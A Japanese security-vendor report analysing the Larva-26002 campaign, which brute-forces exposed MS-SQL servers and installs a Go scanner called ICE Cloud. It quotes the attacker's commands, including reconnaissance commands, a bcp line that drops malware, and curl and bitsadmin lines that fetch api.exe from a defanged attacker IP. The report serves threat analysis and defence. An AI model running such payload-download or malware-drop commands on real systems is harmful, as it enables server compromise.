ICE Cloud スキャナーをインストールする MS-SQL サーバーを対象とする攻撃事例(Larva-26002)

AhnLab SEcurity intelligence Center(ASEC)は、2026年にも Larva-26002 攻撃者が不適切に管理されている MS-SQL サーバーを攻撃していることを確認した。Larva-26002 攻撃者は過去の Trigona ランサムウェアと Mimic ランサムウェアの配布を行ってきたが、その後は感染システムに対する操作を奪い、スキャナーをインストールしている。近年、 確認されている攻撃では Go 言語で製作されたスキャナー マルウェア ICE Cloud Client が使用されている。

Larva-26002 攻撃者は、2024年1月 MS-SQL サーバーを攻撃し、Trigona ランサムウェアと Mimic ランサムウェアをインストールしたが、[1] Mimic ランサムウェアで使用された電子メールアドレスは他の攻撃事例での使用は知られていないが、Trigona ランサムウェアで使用された電子メールアドレスは Palo Alto 社と[2]　Zscaler 社で [3] 扱った電子メールアドレスと同じであった.この攻撃の特徴は MS-SQL サーバーの BCP(Bulk Copy Program)ユーティリティを悪用したという点である。攻撃者はこの他にも、遠隔操作を目的に AnyDesk をインストールし、RDP 接続のために Port forwarder をインストールすることもあった。同じ攻撃者は2025年にも攻撃を持続しており、AnyDesk の他にも RMM ツールである Teramind を使用しており、Rust で製作されたスキャナーを使用したことが特徴である。[4]

2026年には以前の事例と同じく、不適切に管理されている MS-SQL サーバーを攻撃し、BCP を悪用してマルウェアを生成し、最終的にスキャナーマルウェアをインストールしたという点も同じである.しかし、Go 言語で製作された ICE Cloud という名前のスキャナーを使用しているという点が特徴であり、ICE Cloud で使用された文字列はトルコ語であり、過去の Mimic ランサムウェアの攻撃者もまたトルコ語を使用したものと知られている。[5]

1. MS-SQL サーバーを対象とする攻撃

Larva-26002は、外部に公開されており、単純にアカウント情報を設定しているため、総当たり攻撃や辞書攻撃に脆弱な MS-SQL サーバーを攻撃する。.攻撃に成功した後は、以下のようなコマンドを利用して感染システムに対する情報を収集する。

> hostname

> whoami

> ifconfig

> ifconfig /all

> netstat -an

> tasklist

> tasklist /FI “IMAGENAME eq sqlservr.exe” /FO CSV /NH

以後 BCP ユーティリティを 利用し、 マルウェアを 生成する。参考に、 BCP ユーティリティである bcp.exe は MS-SQL サーバーで大量の外部データを取り込んだり、エクスポートするのに使用されるコマンドラインツールである。一般的に SQL サーバーのテーブルに保存されている大量のデータをローカルのファイルに保存したり、ローカルに保存されているデータファイルを SQL サーバーのテーブルにエクスポートするのに使用される。

攻撃者はデータベースにマルウェアを保存した後、BCP を利用してローカルにファイルで生成する方式を使用する、すなわち、攻撃者はマルウェアが保存されているテーブル“uGnzBdZbsi”で次のようなコマンドを利用し、ローカルパスにマルウェアをエクスポートした。“FODsOZKgAU.txt”はフォーマットファイルであり、フォーマット情報が含まれている。参考に、“uGnzBdZbsi”と“FODsOZKgAU.txt”はすべて2024年の攻撃事例から持続的に使用されているキーワードである。

> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\api.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”

図1. BCP ユーティリティを悪用したマルウェア生成

特定の環境では BCP を利用するのではなく Curl または Bitsadmin ツール、そして PowerShell を利用してスキャナーマルウェアをダウンロードすることもあった。

> curl -o “C:\programdata\api.exe” “hxxp://109.205.211[.]13/api.exe”

> bitsadmin /transfer job1 /download /priority high “hxxp://109.205.211[.]13/api.exe” “C:\programdata\api.exe”

図2. PowerShell を利用したスキャナーマルウェアのダウンロード

2. ICE Cloud(スキャナー)

BCP または Curl、Bitsadmin を通じて作成した“api.exe”は“ICE Cloud Client”という名前のマルウェアをインストールする Downloader である。このマルウェアはスキャナーであり Brute Force ツールとして Go 言語で開発された“ICE Cloud Launcher”という名前が付けられている. “-show9” 引数とともに実行すると次のような実行ログを確認することができる。

図3. ICE Cloud Launcher 実行ログ

ICE Cloud Launcher は C&C サーバーに次のようなパケットを送信して認証し、その後ダウンロードリクエストを送ってスキャナー、すなわち“ICE Cloud Client”をダウンロードする。 ダウンロードされた“ICE Cloud Client”は同じ経路に正常なプログラムに偽装したランダムな名前で作成される。

図4. C&C サーバーとの認証プロセス

“ICE Cloud Client”もまた Go 言語で製作されており、実質的に MS-SQL サーバーに対するスキャン機能を担っている。バイナリに含まれた文字列はトルコ語で書かれており、このほかにも使用された絵文字を見ると製作者が生成型 AI を活用したものと見られる. RDP プロトコルの場合、単純な接続テスト機能は存在するが、スキャンコマンドはまだ対応していないものと見られる。

図5. トルコ語文字列と絵文字

図6. ICE Cloud Client 実行ログ

スキャナーは C&C サーバーとの認証後、登録プロセスを進め、これによりサーバーは事前に攻撃対象の MS-SQL サーバーのアドレスリストを送信する. そして“TASK” 文字列と共にスキャン対象のプロトコル“mssql”, ID/PW である“ecomm/ecomm” を送信する. スキャナーは、これを参考にスキャン対象のアドレスに受け取った ID/PW で MS-SQL 認証を試み、成功結果を C&C サーバーに送信する。

図7. C&C サーバーから受け取ったスキャンデータ

3. 結論

MS-SQL サーバーを対象とする攻撃には代表的に、不適切にアカウント情報を管理しているシステムへの総当たり攻撃(Brute Forcing)と、辞書攻撃(Dictionary Attack)がある。管理者は、アカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃からデータベースサーバーを保護する必要がある。

そして、V3 製品を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払う必要がある。また、外部に公開されていてアクセスが可能なデータベースサーバーに関しては、ファイアウォールのようなセキュリティ製品を利用して外部の攻撃者からのアクセスを統制しなければならない。 上記のような処置が先行されていない場合、攻撃者やマルウェアによって感染状態が続くことがある。